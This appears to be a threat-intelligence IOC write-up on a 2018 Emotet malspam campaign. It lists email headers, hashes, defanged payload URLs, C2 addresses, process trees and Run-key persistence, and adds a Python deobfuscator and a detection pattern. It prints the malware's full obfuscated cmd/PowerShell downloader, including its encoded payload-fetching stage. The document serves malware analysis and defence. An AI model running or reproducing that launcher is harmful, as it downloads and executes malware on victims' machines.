- #IOC #OptiData #VR #Emotet #Banker #Feodo #W97M #Powershell
- https://pastebin.com/THHMs2wg
- other_Emotet_IOCs:
- https://pastebin.com/KVNyw9Uq
- https://pastebin.com/L2nSzNU4
- previous contact:
- https://pastebin.com/Y6DnbpHv
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
- https://kc.mcafee.com/corporate/index?page=content&id=KB90108
- attack_vector
- --------------
- email attachment .doc > VBA macro > cmd > powershell > HTTP GET > %temp%\*.exe (here dropped as C:\tmp\862.exe, then copied to %LOCALAPPDATA%\Microsoft\Windows\colorerkey.exe)
- email_headers
- --------------
- Received: from public-swhrmf-2c.serverdata.net (public-swhrmf-2c.serverdata.net [64.78.61.27])
- Received: from public-swhrmf-2c.serverdata.net ([64.78.61.27])
- Received: from mail12.intermedia.net (unknown [64.78.61.134])
- Date: Fri, 09 Nov 2018 03:44:58 -0300
- From: Интернет-магазин С торгом <info@storgom.ua> <auxiliaradmon1@ravisa.com>   (display name "Storgom online store"; the display name carries info@storgom.ua while the real sender address is auxiliaradmon1@ravisa.com)
- To: user0@hq.88.victim.com
- Subject: Интернет-магазин С торгом: Order receipt #4553   ("Storgom online store: Order receipt #4553")
- files
- --------------
- SHA-256 af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8
- File name FILE-901171445210110.doc
- File size 71.13 KB
- SHA-256 9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d
- File name extr
- File size 132 KB
- SHA-256 db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050
- File name WCPDll
- File size 357.5 KB
- activity
- **************
- payload_src
- --------------
- h11p\мягкое-стекло{.} рф/OYRECjhJU 404   (Cyrillic IDN, "soft-glass.rf")
- h11p\sastudio{.} co/GgGV3mOVlN 200
- h11p\priscawrites{.} com/tS6M2ffhC 200
- h11p\gbsbrows{.} com/JZLqJd4 200
- h11p\evelin{.} ru/fgARtN6g 404
- netwrk
- --------------
- 132.148.254.223 gbsbrows{.} com GET /JZLqJd4 HTTP/1.1 no User Agent
- 187.163.174.149 187.163.174.149:8080 GET / HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 2604 132.148.254.223 80 ESTABLISHED
- colorerkey.exe 2656 187.163.174.149 8080 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\CMD.exe CMD c:\wiNdoWS\SySTem32\CMd /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x') ...
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ...
- "C:\tmp\862.exe"
- "C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe"
- *obfuscated download command:
- --------------
- /c"SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()}) && pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ; ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) ( \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri' ).Invoke( ( ( .('Gi' ) ( \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke( 'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss' ) ) ) )"
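- The command above is a three-stage handoff: cmd.exe stores stage 1 (the `.(iex)( New-Object IO.Compression.DeflateStream(...) )` expression) in the process environment variable vmN, then starts a second powershell.exe whose `-f` format-operator strings rebuild `Set-Item Variable:0SkX ([type]Environment)`, `(Get-Variable EX*xT).Value.InvokeCommand.InvokeScript(...)` (EX*xT wildcards to $ExecutionContext) and `[Environment]::GetEnvironmentVariable('vmN','Process')`, so the launcher never contains the downloader text itself. Stage 2, the real downloader, is the base64/DEFLATE blob inside stage 1. The Python below is an added deobfuscator written for this page, not code from the paste's author; it works only on the text copied from the command line above (the two stage strings are constants) and assumes the default Windows PowerShell value of $ShellId ("Microsoft.PowerShell", whose characters 1 and 13 plus 'x' spell "iex"). If the blob was copied intact, stage 2 should be the script that walks the payload_src hosts listed above; if it was not, decode_stage2 returns None instead of raising.

```python
"""Static deobfuscation of the Emotet cmd/PowerShell launcher quoted on this page.

Added example, not part of the original paste. STAGE1 and STAGE3 are copied from the
page's "obfuscated download command"; nothing here touches the network.
"""
import base64
import re
import zlib

# Value of $ShellId in a default Windows PowerShell session (assumption documented in lead-in).
SHELL_ID = "Microsoft.PowerShell"

# Stage 1: what cmd.exe stores in %vmN% (still carries cmd's ^| and ^& escapes).
STAGE1 = r"""SEt vmN=.( $sHELLId[1]+$sHeLlid[13]+'x')( New-oBJEct io.coMpREsSioN.dEFLatEstREAM([iO.MEmorysTREAm] [COnVERt]::FrOMbaSe64sTrINg( 'NZDdasJAEIVfJRcLq1g3VEsoLgGLVlFaBaX2h95kk0l2NdlNk4lrG3z3JrbO5fnOHOYMqaLC12D7RuwhRGcFyF5BTFIFGjmZTn98KhHzkesmohSFsSULTeYuP56+ltHd+J9Za1kZlFhFyjTcnSfz3TBb79LV1XHS/WYARSJsJEUVD4PM06yV89tAuev3zeNkL5cv1wU4Qqo0Kyo3Th42uPKSK8kLVYaBLRTC3zG49Z4HcSwnlG3zVGGHjmmXk7do5vgOvfcGlJNoM/MJ6OMIIct79JP2Wt6jDE5AeWwKCELZIVhKR2mnLd6tsfiuSfMgNjVWpyaIZiqFi+fGaQO7fKGP5gD9RRN6Ubhocg78HAYYyvp8/gU=' ) , [sYstem.io.COMPressIoN.ComPrESSIonMOdE]::DeCOMPress ) ^| % {New-oBJEct syStem.io.STreAmrEadEr( $_, [SYsTEM.tExT.EnCOdiNg]::aScII)}^| %{ $_.reAdTOeND()})"""

# Stage 3: the second powershell.exe command line that pulls %vmN% back out and runs it.
STAGE3 = r"""pOwERsHEll . (\"{1}{0}{2}\" -f 'I','SET-','tem') ( \"{0}{3}{1}{2}\"-f'vARI','lE',':0SkX','ab' ) ( [tYPE]( \"{0}{1}{2}\"-f 'E','N','VirOnment' ) ) ; ( ^& (\"{1}{0}{2}\" -f'ARIA','V','blE' ) ( \"{1}{0}\" -f 'X*xT','E')).\"Val`UE\".\"INvo`kECOmM`AND\".(\"{1}{2}{3}{0}\" -f'PT','in','Vok','ESCri' ).Invoke( ( ( .('Gi' ) ( \"{0}{1}{2}\" -f 'VArIA','bLE:0S','kx')).\"Val`Ue\"::( \"{4}{1}{0}{2}{5}{3}\"-f 'E','t','nvIro','eNtVARIAbLE','ge','nM').Invoke( 'VmN',(\"{1}{0}{2}\" -f 'RoCE','P','ss' ) ) ) )"""


def cmd_unescape(s):
    """Undo cmd.exe quoting: \\" becomes " and ^x becomes x."""
    s = s.replace('\\"', '"')
    return re.sub(r"\^(.)", r"\1", s)


def resolve_shellid(s):
    """Replace $ShellId[n] with the literal character it indexes."""
    return re.sub(r"\$shellid\[(\d+)\]",
                  lambda m: "'" + SHELL_ID[int(m.group(1))] + "'", s, flags=re.I)


# "{1}{0}{2}" -f 'a','b','c'  ->  the string the format operator would build
_FMT = re.compile(r'''"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)''', re.I)


def resolve_format_operator(s):
    def repl(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        try:
            return "'" + re.sub(r"\{(\d+)\}", lambda i: args[int(i.group(1))], m.group(1)) + "'"
        except IndexError:          # malformed template: leave the original text alone
            return m.group(0)
    return _FMT.sub(repl, s)


def collapse_concat(s):
    """'a'+'b' -> 'ab', repeated until nothing changes."""
    pat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        new = pat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if new == s:
            return s
        s = new


def strip_backticks(s):
    """Drop backticks used purely to split identifiers; keep real escapes like `n or `t."""
    return re.sub(r"`(?![0abefnrtuv])", "", s)


def deobfuscate(ps):
    s = cmd_unescape(ps)
    s = resolve_shellid(s)
    s = resolve_format_operator(s)
    s = collapse_concat(s)
    return strip_backticks(s)


def extract_stage2_b64(stage1):
    m = re.search(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'", stage1, re.I)
    return m.group(1) if m else None


def decode_stage2(b64):
    """Reverse [Convert]::FromBase64String + DeflateStream(Decompress).

    .NET DeflateStream emits raw DEFLATE (no zlib header), hence wbits = -15.
    Returns None instead of raising when the blob is not intact.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
        return zlib.decompress(raw, -zlib.MAX_WBITS).decode("ascii")
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    print("stage 1 (env var vmN):\n" + deobfuscate(STAGE1) + "\n")
    print("stage 3 (launcher):\n" + deobfuscate(STAGE3) + "\n")
    stage2 = decode_stage2(extract_stage2_b64(STAGE1))
    print("stage 2 (decompressed downloader):\n" +
          (stage2 or "<blob did not decode; check that the base64 was copied intact>"))
```

- Reading the resolved stage 3 gives `Set-Item Variable:0SkX ([type]Environment); (& Variable EX*xT).Value.InvokeCommand.InvokeScript((Get-Item Variable:0Skx).Value::GetEnvironmentVariable('VmN','Process'))`, which is the pattern to hunt for: a powershell.exe child of cmd.exe whose command line references GetEnvironmentVariable and InvokeScript while the parent cmd.exe sets a variable containing FromBase64String and DeflateStream.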
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 09.11.2018 14:52
- value name: colorerkey; file description "Windows Componentization Platform Servicing API", company "Microsoft Corporation" (Microsoft-looking version info on a binary dropped in the user profile)
- c:\users\operator\appdata\local\microsoft\windows\colorerkey.exe 09.11.2018 14:45
- drop
- --------------
- C:\tmp\862.exe
- C:\Users\operator\AppData\Local\Microsoft\Windows\colorerkey.exe
- # # #
- doc - https://www.virustotal.com/#/file/af2b3dd1afe2b337ea192b9443f4368cc8c6e488d9913fe1ac64ac55e9bb49c8/details
- exe - https://www.virustotal.com/#/file/9ff551c66e520652a8f1e1ea832a1e361b9a4d877acf1c4fb6001366fbc2ef3d/details
- https://analyze.intezer.com/#/analyses/c028884b-15ca-4bda-abd0-a22d511fe240
- exe#2 - https://www.virustotal.com/#/file/db04c89d578d8796007591e2f9c5c0b306fdbf13351232bad8c9fa2acd08e050/details
- https://analyze.intezer.com/#/analyses/01b66204-33f5-4128-8f0f-11db305a3101